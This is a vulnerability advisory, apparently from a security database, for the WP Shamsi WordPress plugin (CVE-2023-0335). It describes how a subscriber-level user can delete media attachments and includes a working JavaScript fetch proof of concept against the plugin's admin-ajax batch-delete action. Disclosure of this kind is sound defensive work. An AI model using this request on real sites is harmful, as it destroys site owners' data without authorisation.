Lucene search
Lana CodesWPEX-ID:F7A20BEA-C3D5-431B-BDCF-E189C81A561AHistoryFeb 28, 2023 - 12:00 a.m.
WP Shamsi <= 4.3.3 - Subscriber+ Attachment Deletion
2023-02-2800:00:00
Lana Codes
83
wordpress
shamsi
subscriber
attachment
deletion
exploit
ajax
security
vulnerability
0.001 Low
EPSS
Percentile
20.2%
The plugin has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber delete attachment.
Exploit (#1 attachment id delete):
fetch('http://localhost/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=exopite-sof-file-batch-delete&media-ids%5B%5D=1&media-ids%5B%5D=1',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));Related
wpvulndb
wpvulndb
WP Shamsi <= 4.3.3 - Subscriber+ Attachment Deletion
2023-02-28 00:00:00
cvelist
cvelist
CVE-2023-0335 WP Shamsi <= 4.3.3 - Subscriber+ Attachment Deletion
2023-03-27 15:37:21
nvd
nvd
CVE-2023-0335
2023-03-27 16:15:08
cve
cve
CVE-2023-0335
2023-03-27 16:15:08
prion
prion
Improper access control
2023-03-27 16:15:00
wordfence
wordfence